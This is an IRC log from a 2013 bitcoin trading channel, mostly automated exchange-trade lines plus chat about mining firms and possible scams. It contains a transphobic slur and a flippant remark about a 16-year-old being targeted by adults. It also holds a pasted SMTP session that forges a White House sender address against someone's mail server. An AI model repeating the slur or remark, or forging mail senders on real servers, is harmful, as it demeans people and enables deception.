11 20:21:26 [MPEX] [S.MPOE] 3323 @ 0.00073054 = 2.4276 BTC [+] Jun 11 20:21:58 [BTCTC] [ESECURITYSABTC] 1 @ 0.192751 BTC [+] Jun 11 20:24:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.008405 BTC [+] Jun 11 20:26:28 [BTCTC] [TAT.ASICMINER] 11 @ 0.024885 = 0.2737 BTC [-] Jun 11 20:26:30 [BTCTC] [TAT.ASICMINER] 49 @ 0.024885 = 1.2194 BTC [-] Jun 11 20:28:59 [BTCTC] [DMS.PURCHASE] 35 @ 0.066195 = 2.3168 BTC [+] Jun 11 20:29:13 [BTCTC] [DMS.PURCHASE] 100 @ 0.066195 = 6.6195 BTC [+] Jun 11 20:32:29 [BTCTC] [DMS.MINING] 3 @ 0.03342 = 0.1003 BTC [-] Jun 11 20:33:00 [BTCTC] [ASICMINER-PT] 1 @ 2.492 BTC [+] Jun 11 20:33:52 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.008444 = 1.6888 BTC [+] Jun 11 20:33:54 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00848 = 0.424 BTC [+] Jun 11 20:34:27 [HAVELOCK] [ASICM] 50 @ 0.02524 = 1.262 BTC [+] Jun 11 20:37:48 [HAVELOCK] [ASICM] 10 @ 0.02524 = 0.2524 BTC [+] Jun 11 20:38:39 ;;seen mircea_popescu Jun 11 20:38:39 mircea_popescu was last seen in #bitcoin-assets 1 hour, 21 minutes, and 46 seconds ago: a ok Jun 11 20:39:47 [HAVELOCK] [SDICE] 1 @ 0.2398 BTC [+] Jun 11 20:40:22 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0095 = 0.019 BTC [+] Jun 11 20:41:27 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0085 = 0.85 BTC [-] Jun 11 20:41:29 [BTCTC] [TAT.VIRTUALMINE] 91 @ 0.008405 = 0.7649 BTC [-] Jun 11 20:43:44 [BITFUNDER] [TAT.VIRTUALMINE] [DIVIDEND PAID] 115,000 @ 0.00003223 Jun 11 20:46:57 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] Jun 11 20:48:21 [BTCTC] [BASIC-MINING] 1 @ 0.695555 BTC [+] Jun 11 20:49:41 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00895 = 0.4475 BTC [+] Jun 11 20:51:21 [BTCTC] [TAT.VIRTUALMINE] 34 @ 0.00895 = 0.3043 BTC [+] Jun 11 20:56:27 [MPEX] [S.MPOE] 7954 @ 0.00073054 = 5.8107 BTC [+] Jun 11 21:02:48 Guest20671: warez mpexbot! Jun 11 21:03:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.02495 = 0.0749 BTC [+] Jun 11 21:04:51 [BTCTC] [DMS.PURCHASE] 41 @ 0.066195 = 2.714 BTC [+] Jun 11 21:05:01 [BTCTC] [BASIC-MINING] 2 @ 0.695555 = 1.3911 BTC [+] Jun 11 21:05:50 [BTCTC] [BASIC-MINING] 1 @ 0.6512 BTC [-] Jun 11 21:09:08 https://bitcointalk.org/index.php?topic=230433.msg2440565#msg2440565 bitdating Jun 11 21:10:24 [HAVELOCK] [ASICM] 70 @ 0.02524 = 1.7668 BTC [+] Jun 11 21:11:07 Years ago, I was helped with testing on a Sony/ game site - there was a user named Pixels with a girly avatar- people assumed it was a girl and a bunch hit on her Jun 11 21:11:13 [BTCTC] [TAT.ASICMINER] 9 @ 0.02489 = 0.224 BTC [-] Jun 11 21:11:34 then she said she was 16, and still some people hit on her Jun 11 21:12:00 then we found out it was a cop trying to find pervs on the internets Jun 11 21:12:10 [BTCTC] [TAT.ASICMINER] 9 @ 0.024885 = 0.224 BTC [-] Jun 11 21:12:12 I LOL at everyone Jun 11 21:13:05 i was helping Jun 11 21:13:18 no wait, that last line came out wrong Jun 11 21:13:59 I was helped with testing < i was helping Jun 11 21:14:08 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 11 21:14:22 [BTCTC] [ASICMINER-PT] 12 @ 2.5 = 30 BTC [+] Jun 11 21:14:57 [HAVELOCK] [ASICM] 46 @ 0.02500001 = 1.15 BTC [+] Jun 11 21:14:57 [HAVELOCK] [ASICM] 154 @ 0.025 = 3.85 BTC [-] Jun 11 21:15:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.024885 BTC [-] Jun 11 21:16:05 nothing wrong with 16, is there ? Jun 11 21:16:08 old enough to walk... Jun 11 21:16:09 [BTCTC] [TAT.ASICMINER] 39 @ 0.02495 = 0.9731 BTC [+] Jun 11 21:16:41 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [+] Jun 11 21:21:47 [HAVELOCK] [ASICM] 10 @ 0.02524 = 0.2524 BTC [+] Jun 11 21:28:55 [HAVELOCK] [ASICM] 59 @ 0.025249 = 1.4897 BTC [+] Jun 11 21:29:08 [BTCTC] [DMS.PURCHASE] 44 @ 0.066195 = 2.9126 BTC [+] Jun 11 21:32:15 [BTCTC] [TAT.ASICMINER] 58 @ 0.02495 = 1.4471 BTC [+] Jun 11 21:37:31 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00895 = 0.0895 BTC [+] Jun 11 21:38:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] Jun 11 21:42:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] Jun 11 21:45:27 [BTCTC] [BASIC-MINING] 1 @ 0.651101 BTC [-] Jun 11 21:46:12 [BTCTC] [BASIC-MINING] 1 @ 0.6511 BTC [-] Jun 11 21:46:14 [BTCTC] [BASIC-MINING] 1 @ 0.651 BTC [-] Jun 11 21:47:04 https://bitcointalk.org/index.php?topic=229036.0 Jun 11 21:47:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] Jun 11 21:47:19 oh fuck me, not this again Jun 11 21:47:49 [BTCTC] [TAT.ASICMINER] 16 @ 0.024885 = 0.3982 BTC [-] Jun 11 21:48:03 usagi lures me in with normal sounding words Jun 11 21:48:11 [BTCTC] [ASICMINER-PT] 1 @ 2.504 BTC [+] Jun 11 21:48:15 then he rants like nobody's business Jun 11 21:48:25 and i get distracted Jun 11 21:49:23 [BTCTC] [B.YABMC] 67 @ 0.012044 = 0.8069 BTC [-] Jun 11 21:49:26 [BTCTC] [B.YABMC] 1 @ 0.012043 BTC [-] Jun 11 21:49:28 [BTCTC] [B.YABMC] 50 @ 0.012038 = 0.6019 BTC [-] Jun 11 21:49:36 [BTCTC] [B.YABMC] 10 @ 0.012036 = 0.1204 BTC [-] Jun 11 21:49:38 I have him/her he/she tranny bi on ignore Jun 11 21:49:46 [BTCTC] [B.YABMC] 3 @ 0.01201 = 0.036 BTC [-] Jun 11 21:49:52 [BTCTC] [B.YABMC] 6 @ 0.012 = 0.072 BTC [-] Jun 11 21:49:56 [BTCTC] [B.YABMC] 1 @ 0.012 BTC [-] Jun 11 21:50:03 [BTCTC] [B.YABMC] 1 @ 0.01193 BTC [-] Jun 11 21:50:05 [BTCTC] [B.YABMC] 1 @ 0.01111 BTC [-] Jun 11 21:50:07 [BTCTC] [B.YABMC] 47 @ 0.01111 = 0.5222 BTC [-] Jun 11 21:50:11 [BTCTC] [B.YABMC] 17 @ 0.011 = 0.187 BTC [-] Jun 11 21:50:22 [BTCTC] [B.YABMC] 13 @ 0.01 = 0.13 BTC [-] Jun 11 21:51:43 [MPEX] [S.MPOE] 2358 @ 0.00072772 = 1.716 BTC [-] Jun 11 21:51:45 [MPEX] [S.MPOE] 2600 @ 0.00072657 = 1.8891 BTC [-] Jun 11 21:51:52 [BTCTC] [DMS.MINING] 41 @ 0.03327 = 1.3641 BTC [-] Jun 11 21:52:07 [MPEX] [S.MPOE] 4321 @ 0.00072609 = 3.1374 BTC [-] Jun 11 21:52:24 [BTCTC] [TAT.ASICMINER] 11 @ 0.02495 = 0.2745 BTC [+] Jun 11 21:52:37 [MPEX] [S.MPOE] 7021 @ 0.00072608 = 5.0978 BTC [-] Jun 11 21:55:08 [MPEX] [S.MPOE] 9779 @ 0.00072608 = 7.1003 BTC [-] Jun 11 21:55:33 [MPEX] [S.MPOE] 3000 @ 0.00072585 = 2.1776 BTC [-] Jun 11 21:55:35 [MPEX] [S.MPOE] 4821 @ 0.00072538 = 3.4971 BTC [-] Jun 11 22:01:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] Jun 11 22:05:02 [BTCTC] [S.DICE-PT] 5 @ 0.002421 = 0.0121 BTC [-] Jun 11 22:12:18 [BTCTC] [DMS.PURCHASE] 21 @ 0.066195 = 1.3901 BTC [+] Jun 11 22:12:42 [HAVELOCK] [ASICM] 1 @ 0.025249 BTC [+] Jun 11 22:18:29 helllo Jun 11 22:20:23 hi Jun 11 22:20:26 o/ Jun 11 22:21:38 [BTCTC] [DMS.MINING] 7 @ 0.033249 = 0.2327 BTC [-] Jun 11 22:22:10 jborkl, watching that for future lulz. thx. Jun 11 22:24:14 Well, we know it will end with a bunch of drama and some really long posts. maybe someone selling a guitar to pay off a loan. Many lulz to come Jun 11 22:25:05 asicminer price seems to be going up Jun 11 22:31:40 [BTCTC] [TAT.ASICMINER] 40 @ 0.02515 = 1.006 BTC [+] Jun 11 22:33:08 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Jun 11 22:36:01 [HAVELOCK] [SDICE] 1 @ 0.2398 BTC [+] Jun 11 22:38:19 [BTCTC] [DMS.MINING] 5 @ 0.03 = 0.15 BTC [-] Jun 11 22:38:25 good afternoon im pretty new to bitcoin and brand new to trading in bitcoin Jun 11 22:38:37 [HAVELOCK] [ASICM] 10 @ 0.025249 = 0.2525 BTC [+] Jun 11 22:38:49 welcome Gizmo Jun 11 22:39:30 [HAVELOCK] [ASICM] 3 @ 0.025249 = 0.0757 BTC [+] Jun 11 22:40:21 Hi Jun 11 22:40:41 howdy Jun 11 22:40:48 hiya Jun 11 22:41:00 [BTCTC] [DMS.SELLING] 35 @ 0.034012 = 1.1904 BTC [-] Jun 11 22:44:06 [MPEX] [S.MPOE] 12400 @ 0.00072538 = 8.9947 BTC [-] Jun 11 22:44:15 o/ Jun 11 22:44:36 [BTCTC] [DMS.MINING] 95 @ 0.03 = 2.85 BTC [-] Jun 11 22:55:27 [BTCTC] [ASICMINER-PT] 2 @ 2.52 = 5.04 BTC [+] Jun 11 22:56:51 [BTCTC] [TAT.ASICMINER] 19 @ 0.02514 = 0.4777 BTC [-] Jun 11 22:57:33 amc a scam? Jun 11 22:59:26 no good reason to think otherwise. Jun 11 22:59:27 [HAVELOCK] [ASICM] 6 @ 0.02524899 = 0.1515 BTC [-] Jun 11 22:59:35 I'd give it a 30% chance of scam Jun 11 22:59:56 plus another 40% chance of total loss due to incompetance Jun 11 23:00:19 i mostly think he intends to run a large mining effort Jun 11 23:00:36 [BTCTC] [ASICMINER-PT] 2 @ 2.524 = 5.048 BTC [+] Jun 11 23:01:58 he dosent seem to awnser any direct questions. Jun 11 23:02:25 [HAVELOCK] [ASICM] 98 @ 0.02524899 = 2.4744 BTC [-] Jun 11 23:02:25 he's had a LOT of questions Jun 11 23:02:34 Gizmo true. on the other hand most internet kids don't have enough edumancation to be able to carry a conversation outside of "that's cool" / "he's mean". so... could go either way. Jun 11 23:02:34 talk to Vbs if you want the lowdown Jun 11 23:03:22 [HAVELOCK] [ASICM] 686 @ 0.02524899 = 17.3208 BTC [-] Jun 11 23:05:15 Yes, I was a believer until i seen a post where someone in his are asked to visit him and he said he could n a number of weeks as he was moving to new premises. Surely he would meet the person to help validate his claim of a legitimate enterprise. Jun 11 23:05:36 [BTCTC] [ASICMINER-PT] 1 @ 2.524 BTC [+] Jun 11 23:05:58 well i know i'd never give my address willingly to the bitcoin hordes Jun 11 23:06:16 [BTCTC] [ASICMINER-PT] 1 @ 2.524 BTC [+] Jun 11 23:06:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.025 = 0.15 BTC [-] Jun 11 23:06:57 (i'm not invested in AMC btw) Jun 11 23:09:59 Would still meet for a pint somewhere. Jun 11 23:16:14 [BTCTC] [BASIC-MINING] 1 @ 0.698999 BTC [+] Jun 11 23:16:16 [MPEX] [S.MPOE] 3979 @ 0.00072538 = 2.8863 BTC [-] Jun 11 23:16:17 [MPEX] [S.MPOE] 391 @ 0.00072535 = 0.2836 BTC [-] Jun 11 23:17:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.02514 = 0.2765 BTC [+] Jun 11 23:23:23 ThickAsThieves why not ? Jun 11 23:26:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02514 BTC [+] Jun 11 23:27:02 [MPEX] [S.MPOE] 6000 @ 0.00072801 = 4.3681 BTC [+] Jun 11 23:28:12 why not what? Jun 11 23:28:18 give people my addy? Jun 11 23:28:28 because some of these people are mental Jun 11 23:28:48 or why not an investor? Jun 11 23:36:21 all it practically produces is lulz. looky : Jun 11 23:36:57 https://bitcointalk.org/index.php?topic=228812.msg2430285#msg2430285 Jun 11 23:39:01 [MPEX] [S.MPOE] 998 @ 0.00072535 = 0.7239 BTC [-] Jun 11 23:39:18 yeah but yer in ROmania Jun 11 23:39:28 no one bitcoins there but you Jun 11 23:39:31 ;) Jun 11 23:40:32 [BTCTC] [TAT.ASICMINER] 66 @ 0.025139 = 1.6592 BTC [-] Jun 11 23:41:28 you think ? Jun 11 23:41:34 [BTCTC] [TAT.ASICMINER] 34 @ 0.02514 = 0.8548 BTC [+] Jun 11 23:41:36 one of the top 5 nodes is actually romanian, Jun 11 23:41:42 and i don't even sign my nodes. Jun 11 23:41:46 you mean the super nodes Jun 11 23:42:15 AM's first solo block noded from ROmania Jun 11 23:43:04 http://blockchain.info/hub-nodes Jun 11 23:43:09 but i see it dropped down Jun 11 23:44:18 [HAVELOCK] [ASICM] 35 @ 0.0252 = 0.882 BTC [-] Jun 11 23:45:17 mail.bitcurex.com Jun 11 23:45:22 [HAVELOCK] [ASICM] 19 @ 0.0255 = 0.4845 BTC [+] Jun 11 23:45:24 lmao people relaying off the mailserver ? Jun 11 23:46:00 wat Jun 11 23:46:36 mail.medicacorp.com Jun 11 23:46:37 dafuck Jun 11 23:47:00 [BTCTC] [RSM] 44 @ 0.00658 = 0.2895 BTC [-] Jun 11 23:48:15 mail from: obama@whitehouse.gov Jun 11 23:48:15 250 2.1.0 Ok Jun 11 23:48:15 rcpt to: office@polimedia.us Jun 11 23:48:15 554 5.7.1 : Relay access denied Jun 11 23:49:19 story doesnt check out Jun 11 23:50:32 wait whut ?! Jun 11 23:50:55 yes Jun 11 23:51:51 did you receive that ? Jun 11 23:52:09 or wtf Jun 11 23:52:16 thats me trying to send you mail from obama Jun 11 23:52:20 dub: relaying bitcoin blocks or a mail server relay? Jun 11 23:52:31 oh right Jun 11 23:52:41 lol ok Jun 11 23:52:51 yeah rDNS is broken thanks to anti spam fucktards Jun 11 23:52:54 [BTCTC] [PAJKA.BOND] 4 @ 0.0795 = 0.318 BTC [-] Jun 11 23:52:55 [BTCTC] [PAJKA.BOND] 1 @ 0.079 BTC [-] Jun 11 23:52:56 [BTCTC] [PAJKA.BOND] 10 @ 0.078 = 0.78 BTC [-] Jun 11 23:53:14 sorry babeh. gotta have reverse dns to talk to me. Jun 11 23:53:25 [BTCTC] [DMS.MINING] 50 @ 0.031 = 1.55 BTC [+] Jun 11 23:53:38 I thought you were saying bitcurex was an open relay Jun 11 23:53:58 I can send mail to you directly fine, from obama Jun 11 23:53:58 no, what i was saying was that their mail server figures in the blockchain.info block relay list Jun 11 23:54:26 which makes little sense unless a. they don't know how to set zones or b. they actually run a server off the mailserver box Jun 11 23:54:40 b seems unlikely, seeing how bitcoin tards tend to run everything off the same box. Jun 11 23:58:37 [HAVELOCK] [ASICM] 20 @ 0.0255 = 0.51 BTC [+] Jun 11 23:59:04 given the roundcube login Im going with b Jun 12 00:03:23 lol ok Jun 12 00:03:47 I guess its a good signal seeing bitco's on that list Jun 12 00:03:55 okay mircea popescu Jun 12 00:04:15 To procede our works, we have to ask you to cancel your's cancel all bids and remove BTC collected in bitcurex.com profile (the balance must be 0.00000000 BTC) for about 24 hours. Jun 12 00:04:15 The EUR/USD/GPB balance is saved and will be rewrite to your bitcurex.com profile. Jun 12 00:04:15 At 00.00 o'clock on 15th May 2013 our service will be unaccessable for 24 hours. Jun 12 00:04:39 presumably its a sign of good security Jun 12 00:19:32 [HAVELOCK] [ASICM] 623 @ 0.02511 = 15.6435 BTC [-] Jun 12 00:19:33 [HAVELOCK] [ASICM] 6 @ 0.02510001 = 0.1506 BTC [-] Jun 12 00:19:34 [HAVELOCK] [ASICM] 45 @ 0.0251 = 1.1295 BTC [-] Jun 12 00:19:36 [HAVELOCK] [ASICM] 47 @ 0.0250001 = 1.175 BTC [-] Jun 12 00:19:37 [HAVELOCK] [ASICM] 179 @ 0.025 = 4.475 BTC [-] Jun 12 00:20:24 [BTCTC] [DMS.PURCHASE] 1 @ 0.066195 BTC [+] Jun 12 00:24:00 [BTCTC] [PAJKA.BOND] 1 @ 0.089991 BTC [+] Jun 12 00:24:02 [BTCTC] [PAJKA.BOND] 4 @ 0.089991 = 0.36 BTC [+] Jun 12 00:25:09 [BTCTC] [PAJKA.BOND] 5 @ 0.089992 = 0.45 BTC [+] Jun 12 00:25:52 [BTCTC] [ASICMINER-PT] 2 @ 2.5235 = 5.047 BTC [-] Jun 12 00:26:35 [BTCTC] [ASICMINER-PT] 3 @ 2.52 = 7.56 BTC [-] Jun 12 00:32:48 [BTCTC] [S.MPOE-PT] 10 @ 0.000635 = 0.0064 BTC [-] Jun 12 00:39:38 [BTCTC] [COGNITIVE] 1 @ 0.274101 BTC [-] Jun 12 00:40:21 mircea_popescu: you still here? Jun 12 00:41:25 [BTCTC] [ASICMINER-PT] 1 @ 2.5235 BTC [+] Jun 12 00:41:45 [BTCTC] [DMS.MINING] 9 @ 0.031 = 0.279 BTC [+] Jun 12 00:41:56 [BTCTC] [ASICMINER-PT] 1 @ 2.5235 BTC [+] Jun 12 00:43:25 ANNOUNCEMENT: Full API is now available for Havelock Investments - let the bot trading begin! Jun 12 00:46:14 [BTCTC] [ASICMINER-PT] 1 @ 2.5235 BTC [+] Jun 12 00:46:17 [BTCTC] [ASICMINER-PT] 3 @ 2.5235 = 7.5705 BTC [+] Jun 12 00:47:00 boooooo Jun 12 00:47:03 [BTCTC] [TAT.ASICMINER] 18 @ 0.02514 = 0.4525 BTC [+] Jun 12 00:49:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.02501 = 0.1501 BTC [-] Jun 12 00:49:18 [BTCTC] [TAT.ASICMINER] 30 @ 0.025 = 0.75 BTC [-] Jun 12 00:49:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.0249 = 0.249 BTC [-] Jun 12 00:49:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.0249 = 0.1245 BTC [-] Jun 12 00:50:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [-] Jun 12 00:50:20 [BTCTC] [ASICMINER-PT] 1 @ 2.5235 BTC [+] Jun 12 00:53:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.02514 = 0.1257 BTC [+] Jun 12 00:56:47 yea ? Jun 12 00:57:24 [BTCTC] [TAT.ASICMINER] 6 @ 0.02514 = 0.1508 BTC [+] Jun 12 00:57:26 https://www.havelockinvestments.com/apidoc.php Jun 12 01:03:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.02514 = 0.1508 BTC [+] Jun 12 01:03:11 [BTCTC] [CRYPTO-TRADE] 1 @ 0.15 BTC [-] Jun 12 01:04:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.025168 = 0.2517 BTC [+] Jun 12 01:04:18 [BTCTC] [TAT.ASICMINER] 35 @ 0.025169 = 0.8809 BTC [+] Jun 12 01:05:05 [BTCTC] [ASICMINER-PT] 1 @ 2.5235 BTC [+] Jun 12 01:05:07 [BTCTC] [ASICMINER-PT] 2 @ 2.524 = 5.048 BTC [+] Jun 12 01:05:08 [BTCTC] [ASICMINER-PT] 1 @ 2.525 BTC [+] Jun 12 01:06:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.025169 = 0.1258 BTC [+] Jun 12 01:06:45 [BTCTC] [TAT.ASICMINER] 90 @ 0.025185 = 2.2667 BTC [+] Jun 12 01:07:49 [BTCTC] [CRYPTO-TRADE] 10 @ 0.138101 = 1.381 BTC [-] Jun 12 01:07:51 [BTCTC] [CRYPTO-TRADE] 16 @ 0.1381 = 2.2096 BTC [-] Jun 12 01:07:52 [BTCTC] [CRYPTO-TRADE] 2 @ 0.137 = 0.274 BTC [-] Jun 12 01:07:53 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1352 BTC [-] Jun 12 01:07:55 [BTCTC] [CRYPTO-TRADE] 1 @ 0.131 BTC [-] Jun 12 01:08:09 [HAVELOCK] [ASICM] 1 @ 0.0254 BTC [+] Jun 12 01:08:22 [MPEX] [S.MPOE] 1811 @ 0.00072535 = 1.3136 BTC [-] Jun 12 01:08:24 [MPEX] [S.MPOE] 5000 @ 0.00072389 = 3.6195 BTC [-] Jun 12 01:09:00 [MPEX] [S.MPOE] 4138 @ 0.00072388 = 2.9954 BTC [-] Jun 12 01:11:59 [BTCTC] [DMS.MINING] 58 @ 0.031 = 1.798 BTC [+] Jun 12 01:16:48 [BTCTC] [ASICMINER-PT] 2 @ 2.528 = 5.056 BTC [+] Jun 12 01:16:49 [BTCTC] [ASICMINER-PT] 2 @ 2.529 = 5.058 BTC [+] Jun 12 01:19:22 [BTCTC] [DMS.MINING] 5 @ 0.031 = 0.155 BTC [+] Jun 12 01:19:23 [BTCTC] [DMS.MINING] 5 @ 0.031 = 0.155 BTC [+] Jun 12 01:19:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.025185 BTC [+] Jun 12 01:20:06 [HAVELOCK] [ASICM] 44 @ 0.0254 = 1.1176 BTC [+] Jun 12 01:20:59 [BTCTC] [ASICMINER-PT] 1 @ 2.528 BTC [-] Jun 12 01:21:09 [BTCTC] [ASICMINER-PT] 7 @ 2.529 = 17.703 BTC [+] Jun 12 01:21:12 [HAVELOCK] [ASICM] 37 @ 0.02549 = 0.9431 BTC [+] Jun 12 01:21:14 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [+] Jun 12 01:21:16 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [+] Jun 12 01:23:54 [BTCTC] [TAT.ASICMINER] 9 @ 0.02491 = 0.2242 BTC [-] Jun 12 01:24:06 [BTCTC] [DMS.MINING] 9 @ 0.031 = 0.279 BTC [+] Jun 12 01:25:27 [BTCTC] [DMS.MINING] 13 @ 0.031 = 0.403 BTC [+] Jun 12 01:30:55 looks like AM is switching the rest of their leftover hashing to solomining atm Jun 12 01:31:08 http://www.asicminercharts.com/live/ Jun 12 01:31:48 [BTCTC] [DMS.PURCHASE] 100 @ 0.066195 = 6.6195 BTC [+] Jun 12 01:32:58 [BTCTC] [TAT.ASICMINER] 33 @ 0.025185 = 0.8311 BTC [+] Jun 12 01:41:36 ;;next Jun 12 01:41:38 expecting re-test of 88 | lower targets: 80, 67-72 | resistance: 110 | support: 100, 96-97 | #bitcoin [Mon, 10 Jun 2013 04:15:07 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 1 day, 18 hours, 26 minutes, and 25 seconds ago Jun 12 01:43:11 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [-] Jun 12 01:47:47 Who the fuck pays LTC79 for 1kh/s mining? That's like paying BTC2 for 1mh/s. Jun 12 01:49:30 jcpham: find that e3 announcement? Jun 12 01:50:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.025185 = 0.0756 BTC [+] Jun 12 01:50:40 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [-] Jun 12 01:52:21 [MPEX] [S.MPOE] 265 @ 0.00072801 = 0.1929 BTC [+] Jun 12 01:52:23 [MPEX] [S.MPOE] 5000 @ 0.000729 = 3.645 BTC [+] Jun 12 01:52:29 [MPEX] [S.MPOE] 935 @ 0.00073053 = 0.683 BTC [+] Jun 12 01:53:59 [BTCTC] [B.YABMC] 1 @ 0.01393 BTC [+] Jun 12 01:55:03 [BTCTC] [B.YABMC] 9 @ 0.013939 = 0.1255 BTC [+] Jun 12 01:55:28 [HAVELOCK] [ASICM] 13 @ 0.02545 = 0.3309 BTC [-] Jun 12 02:09:16 [BTCTC] [CRYPTO-TRADE] 15 @ 0.134 = 2.01 BTC [+] Jun 12 02:09:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.025185 BTC [+] Jun 12 02:22:08 ;;bs,stats Jun 12 02:22:08 Error: "bs,stats" is not a valid command. Jun 12 02:22:15 ;;bc,stats Jun 12 02:22:16 Current Blocks: 241002 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 917 blocks | Next Difficulty In About: 4 days, 22 hours, 57 minutes, and 43 seconds | Next Difficulty Estimate: 18707163.8915 | Estimated Percent Change: 19.87443 Jun 12 02:22:23 ;;tslb Jun 12 02:22:25 Time since last block: 28 minutes and 47 seconds Jun 12 02:22:32 C'mon I have a transaction pending... Jun 12 02:23:16 bullshit,stats for #bitcoin-assets: 101% and rising Jun 12 02:23:56 :-) Jun 12 02:25:18 Chaaang-Noi: Thx for the free XRP; they arrived! Sold all my XRP now apart from the 125 you can't sell. Looks to be drifting down ATM. Jun 12 02:26:12 What does AMC stand for? Jun 12 02:26:49 [HAVELOCK] [ASICM] 9 @ 0.02545 = 0.2291 BTC [-] Jun 12 02:27:17 [HAVELOCK] [ASICM] 1 @ 0.02545 BTC [-] Jun 12 02:32:38 Active Mining Cooperative Jun 12 02:34:05 Sounds dodgy Jun 12 02:35:53 [HAVELOCK] [ASICM] 27 @ 0.02545 = 0.6872 BTC [-] Jun 12 02:35:54 [HAVELOCK] [ASICM] 96 @ 0.02548 = 2.4461 BTC [+] Jun 12 02:35:55 [HAVELOCK] [ASICM] 72 @ 0.02549 = 1.8353 BTC [+] Jun 12 02:36:04 [BTCTC] [ASICMINER-PT] 4 @ 2.515 = 10.06 BTC [-] Jun 12 02:36:06 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Jun 12 02:36:08 [BTCTC] [TAT.ASICMINER] 20 @ 0.025185 = 0.5037 BTC [+] Jun 12 02:36:11 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Jun 12 02:36:13 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Jun 12 02:36:15 [BTCTC] [ASICMINER-PT] 1 @ 2.5001 BTC [-] Jun 12 02:36:21 [BTCTC] [ASICMINER-PT] 10 @ 2.5001 = 25.001 BTC [-] Jun 12 02:36:31 [BTCTC] [ASICMINER-PT] 32 @ 2.5 = 80 BTC [-] Jun 12 02:36:37 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Jun 12 02:39:21 [HAVELOCK] [ASICM] 7 @ 0.02549 = 0.1784 BTC [+] Jun 12 02:40:35 ;;last mircea_popescu Jun 12 02:40:35 (last [--{from,in,on,with,without,regexp} ] [--nolimit]) -- Returns the last message matching the given criteria. --from requires a nick from whom the message came; --in requires a channel the message was sent to; --on requires a network the message was sent on; --with requires some string that had to be in the message; --regexp requires a regular expression the message (1 more message) Jun 12 02:40:43 ;;seen mircea_popescu Jun 12 02:40:43 mircea_popescu was last seen in #bitcoin-assets 1 hour, 43 minutes, and 54 seconds ago: yea ? Jun 12 02:48:02 heh Jun 12 02:48:15 what's up man Jun 12 02:49:57 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [+] Jun 12 02:51:23 been workin too much :/ Jun 12 02:58:09 ;;ticker Jun 12 02:58:10 BTCUSD ticker | Best bid: 108.17189, Best ask: 108.99998, Bid-ask spread: 0.82809, Last trade: 108.13944, 24 hour volume: 15894.88865130, 24 hour low: 103.23021, 24 hour high: 109.60000, 24 hour vwap: 106.97920 Jun 12 02:59:26 ;;last --from jcpham Jun 12 02:59:26 Error: I couldn't find a message matching that criteria in my history of 1000 messages. Jun 12 02:59:55 ;;last --in #bitcoin-assets Jun 12 02:59:55 [16:59:47] hows the rabies dub Jun 12 03:00:17 so far so good Jun 12 03:02:11 [BTCTC] [ASICMINER-PT] 1 @ 2.496 BTC [-] Jun 12 03:02:13 [BTCTC] [ASICMINER-PT] 2 @ 2.491 = 4.982 BTC [-] Jun 12 03:02:14 [BTCTC] [ASICMINER-PT] 9 @ 2.49 = 22.41 BTC [-] Jun 12 03:16:53 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [+] Jun 12 03:17:44 [MPEX] [S.MPOE] 10100 @ 0.00072897 = 7.3626 BTC [-] Jun 12 03:17:46 [MPEX] [S.MPOE] 3700 @ 0.0007305 = 2.7029 BTC [+] Jun 12 03:17:53 [MPEX] [S.MPOE] 3386 @ 0.00073053 = 2.4736 BTC [+] Jun 12 03:17:55 [MPEX] [S.MPOE] 4623 @ 0.00073054 = 3.3773 BTC [+] Jun 12 03:20:42 [HAVELOCK] [ASICM] 4 @ 0.025101 = 0.1004 BTC [-] Jun 12 03:20:43 [HAVELOCK] [ASICM] 38 @ 0.0251 = 0.9538 BTC [-] Jun 12 03:20:45 [HAVELOCK] [ASICM] 21 @ 0.025 = 0.525 BTC [-] Jun 12 03:22:23 [HAVELOCK] [ASICM] 40 @ 0.02495011 = 0.998 BTC [-] Jun 12 03:22:24 [HAVELOCK] [ASICM] 40 @ 0.02495 = 0.998 BTC [-] Jun 12 03:22:25 